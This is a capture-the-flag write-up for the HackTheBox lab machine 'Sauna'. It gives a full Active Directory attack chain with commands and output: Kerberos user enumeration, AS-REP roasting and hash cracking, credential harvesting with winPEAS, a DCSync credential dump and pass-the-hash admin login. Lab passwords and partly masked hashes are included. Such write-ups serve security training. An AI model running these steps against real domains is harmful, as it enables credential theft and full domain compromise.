Sauna
AD box on HTB.
Enumeration:
As always we are going to start with nmap to scan for open ports:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oN nmap/services.nmap -vv 10.129.135.36
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-03 14:12 EDT
Nmap scan report for 10.129.135.36
Host is up, received echo-reply ttl 127 (0.14s latency).
Scanned at 2025-09-03 14:12:14 EDT for 257s
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-04 01:13:16Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
<snipped>
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
<snipped>
|_clock-skew: 7h00m03s
<snipped>We have the default open ports on a domain controller, and this time we have http running on port 80, and the domain name mentioned in the ldap banner result, and the host name of the machine is SAUNA.
Also we can see that the clock-skew is too great so I will use ntpdate to synchronize with the target machine if we wanted to interact with Kerberos.
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ sudo ntpdate 10.129.135.36And I will add the IP and the corresponding domain name to the hosts file:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
<snipped>
10.129.135.36 SAUNA.EGOTISTICAL-BANK.LOCAL EGOTISTICAL-BANK.LOCAL SAUNAUser Enumeration:
Now I will start with the web application, lets open it up with Firefox:
If we went to about us page, we will find some potential usernames:
I will save those names into a file and use a tool called username-wordlist-generator.py to create a list of different variation of naming forms:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ cat user.txt
Fergus Smith
Hugo Bear
Steven Kerb
Shaun Coins
Bowie Taylor
Sophie Driver┌──(kali㉿kali)-[/opt/Tools/username-wordlist-generator]
└─$ python3 userlistcreator.py
USERNAME GENERATOR
-------------------------------------------------------- Help :
Add name of users to :/opt/Tools/username-wordlist-generator/user.txt
(Then Restart The Program)
v2.0
--------------------------------------------------------
[*] Names Loaded : + Fergus Smith
+ Hugo Bear
+ Steven Kerb
+ Shaun Coins
+ Bowie Taylor
+ Sophie Driver
[*] Started Converting.....
[*] Successfully Created Usernames
[*] Saving File....
[*] File Saved to : /opt/Tools/username-wordlist-generator/output.txt
[*] Happy Hacking .............If we take a look at the output.txt file:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ cat /opt/Tools/username-wordlist-generator/output.txt
Fergus-Smith
Fergus_Smith
Fergus.Smith
Fergus Smith
FergusSmith
FSmith
FergusS
F-Smith
F_Smith
F.Smith
Fergus-S
Fergus_S
Fergus.S
FS
Hugo-Bear
<snipped>We can also convert all entries in this output file to lowercase, so we can then try them as passwords for example.
Now I will use kerbrute to enumerate those users to try to find any valid domain users:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ kerbrute userenum -d egotistical-bank.local --dc 10.129.135.36 /opt/Tools/username-wordlist-generator/output.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/03/25 - Ronnie Flathers @ropnop
2025/09/03 14:19:21 > Using KDC(s):
2025/09/03 14:19:21 > 10.129.135.36:88
2025/09/03 14:19:21 > [+] VALID USERNAME: FSmith@egotistical-bank.local
2025/09/03 14:19:24 > Done! Tested 84 usernames (1 valid) in 3.314 secondsWe only have one valid domain user out of the output.txt file.
Lets save it into a file.
AS-REP Roasting:
Here we can perform several attacks such as password spraying, AS-REP Roasting, etc.
I tried AS-REP Roasting using impacket-GetNPUsers to perform it:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ impacket-GetNPUsers egotistical-bank.local/ -usersfile users.txt
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:b01a685e5e90d37162daad1a906e3a40$a8820e46d7ef70264b6dc67995452dae75fef5cd7513536277411af47b17dcc1b26453515f6fdf35dd586ddd12021e
9d9ea8a07702a56b10c3992b0678c6d41888346629e07c90e2c4b01500c79f41cca8440f1dc4c802f72bcfbea2ca2005cfcaeb5ef54cb32d9473f39bca25582e7967048fbeb67bde1dc976b7dbc6098421764fedfe2
c55302e36951010673f166d2f3507e12f683568743560aa2ccc39fa4f422e03683b1c4b3d16d99d1763d6a08cb6f6e53282b7d7003e6a4ef8deb62ccbadcc31da2cbbcd3aacb3ac7913415e746a44e3c0d10a4e096d
2c072fa44152012fece764a351a58982fab79d456f8a9f577f8bc3738735172d78b23484b045And indeed fsmith is AS-REP Rostable user.
Now I will try to crack it using hashcat:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ hashcat fsmith.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
<snipped>
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:b01a685e5e90d37162daad1a906e3a40$a8820e46d7ef70264b6dc67995452dae75fef5cd7513536277411af47b17dcc1b26453515f6fdf35dd586ddd12021e
9d9ea8a07702a56b10c3992b0678c6d41888346629e07c90e2c4b01500c79f41cca8440f1dc4c802f72bcfbea2ca2005cfcaeb5ef54cb32d9473f39bca25582e7967048fbeb67bde1dc976b7dbc6098421764fedfe2
c55302e36951010673f166d2f3507e12f683568743560aa2ccc39fa4f422e03683b1c4b3d16d99d1763d6a08cb6f6e53282b7d7003e6a4ef8deb62ccbadcc31da2cbbcd3aacb3ac7913415e746a44e3c0d10a4e096d
2c072fa44152012fece764a351a58982fab79d456f8a9f577f8bc3738735172d78b23484b045:Thestrokes23
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:b01a685...84b045
Time.Started.....: Wed Sep 3 14:21:25 2025 (7 secs)
Time.Estimated...: Wed Sep 3 14:21:32 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1462.4 kH/s (0.95ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10540032/14344385 (73.48%)
Rejected.........: 0/10540032 (0.00%)
Restore.Point....: 10536960/14344385 (73.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Tiffany95 -> ThatHadToHurt
Hardware.Mon.#1..: Util: 23%
<snipped>Now we have valid credentials.
No interesting shares.
BloodHound:
Since we have valid credentials that is the time for BloodHound, lets collect the domain data using netexec, and upload the output to BloodHound:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ netexec ldap 10.129.135.36 -u fsmith -p Thestrokes23 --bloodhound -c all --dns-server 10.129.135.36
LDAP 10.129.135.36 389 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
LDAP 10.129.135.36 389 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23
LDAP 10.129.135.36 389 SAUNA Resolved collection methods: group, objectprops, rdp, localadmin, psremote, acl, session, trusts, dcom, container
LDAP 10.129.135.36 389 SAUNA Done in 00M 47S
LDAP 10.129.135.36 389 SAUNA Compressing output into /home/kali/.nxc/logs/SAUNA_10.129.135.36_2025-09-03_142626_bloodhound.zipStart BloodHound:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ sudo bloodhound
[sudo] password for kali:
Starting neo4j
Neo4j is not running.
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:10457). It is available at http://localhost:7474
There may be a short delay until the server is ready.
...................................................
Bloodhound will start
IMPORTANT: It will take time, please wait...
<snipped>
opening http://127.0.0.1:8080 ┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ mv /home/kali/.nxc/logs/SAUNA_10.129.135.36_2025-09-03_142626_bloodhound.zip .
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ unzip SAUNA_10.129.135.36_2025-09-03_142626_bloodhound.zip
Archive: SAUNA_10.129.135.36_2025-09-03_142626_bloodhound.zip
extracting: SAUNA_10.129.135.36_2025-09-03_142626_gpos.json
extracting: SAUNA_10.129.135.36_2025-09-03_142626_groups.json
extracting: SAUNA_10.129.135.36_2025-09-03_142626_containers.json
extracting: SAUNA_10.129.135.36_2025-09-03_142626_users.json
extracting: SAUNA_10.129.135.36_2025-09-03_142626_computers.json
extracting: SAUNA_10.129.135.36_2025-09-03_142626_domains.json
extracting: SAUNA_10.129.135.36_2025-09-03_142626_ous.json
I did not find anything interesting, but the fsmith is a Remote Management User which means we can WinRM to the machine.
Privilege Escalation:
AutoLogon Credentials:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ evil-winrm -i 10.129.135.36 -u fsmith -p Thestrokes23
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpointAnd I will upload winPEAS.exe to the target machine to find any attack vector that we can take advantage to get to domain admins.
*Evil-WinRM* PS C:\Users\FSmith> upload winPEASany.exe
Info: Uploading /home/kali/Desktop/CTF/Machines/HackTheBox/Sauna/winPEASany.exe to C:\Users\FSmith\winPEASany.exe
Data: 13541376 bytes of 13541376 bytes copied
Info: Upload successful!Now lets run winPEAS.exe:
*Evil-WinRM* PS C:\Users\FSmith> .\winPEASany.exe 14:59:27 [1596/2110]
[!] If you want to run the file analysis checks (search sensitive information in files), you need to specify the 'fileanalysis' or 'all' argument. Note that this search m
ight take several minutes. For help, run winpeass.exe --help
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t RE
G_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable i
t with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
((((((((((((((((((((((((((((((((
(((((((((((((((((((((((((((((((((((((((((((
((((((((((((((**********/##########(((((((((((((
((((((((((((********************/#######(((((((((((
((((((((******************/@@@@@/****######((((((((((
((((((********************@@@@@@@@@@/***,####((((((((((
(((((********************/@@@@@%@@@@/********##(((((((((
(((############*********/%@@@@@@@@@/************((((((((
((##################(/******/@@@@@/***************((((((
((#########################(/**********************(((((
((##############################(/*****************(((((
((###################################(/************(((((
((#######################################(*********(((((
((#######(,.***.,(###################(..***.*******(((((
((#######*(#####((##################((######/(*****(((((
((###################(/***********(##############()(((((
(((#####################/*******(################)((((((
((((############################################)((((((
(((((##########################################)(((((((
((((((########################################)(((((((
((((((((####################################)((((((((
(((((((((#################################)(((((((((
((((((((((##########################)(((((((((
((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((
ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the auth
or or of any other collaborator. Use it at your own devices and/or with the device owner's permission.
WinPEAS-ng by @hacktricks_live
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Learn Cloud Hacking : training.hacktricks.xyz |
| Follow on Twitter : @hacktricks_live |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
[+] Legend:
Red Indicates a special privilege over an object or something is misconfigured
Green Indicates that some protection is enabled or something is well configured
Cyan Indicates active users
Blue Indicates disabled users
LightYellow Indicates linksAfter going through and analyzing the results I found those autologon credentials for svc_loanmgr:
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ netexec smb 10.129.135.36 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
SMB 10.129.135.36 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.129.135.36 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround!DCSync Attack:
Now if we went back to BloodHound to find any interesting ACLs this user has over any other objects by clicking on Outbound Object Control:
We can see that the user svc_loanmgr has GetChangesAll and GetChanges (DS-Replication-Get-Changes-All & DS-Replication-Get-Changes), which means we have DCSync rights.
Lets perform the DCSync via impacket-secretsdump:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ impacket-secretsdump egotistical-bank.local/svc_loanmgr:'Moneymakestheworldgoround!'@10.129.135.36
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1****************:::
<snipped>
[*] Cleaning up... Now we can authenticate to the target with WinRM or via psexec:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Sauna]
└─$ evil-winrm -i 10.129.135.36 -u administrator -H 823452073d75b9d1****************
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
SAUNA
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::7c64:47f8:c009:bccb
Link-local IPv6 Address . . . . . : fe80::7c64:47f8:c009:bccb%7
IPv4 Address. . . . . . . . . . . : 10.129.135.36
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%7
10.129.0.1And we can read the flags:
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
be155c28c4c3d715****************
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\fsmith\Desktop\user.txt
5773859b9b0e369a****************Last updated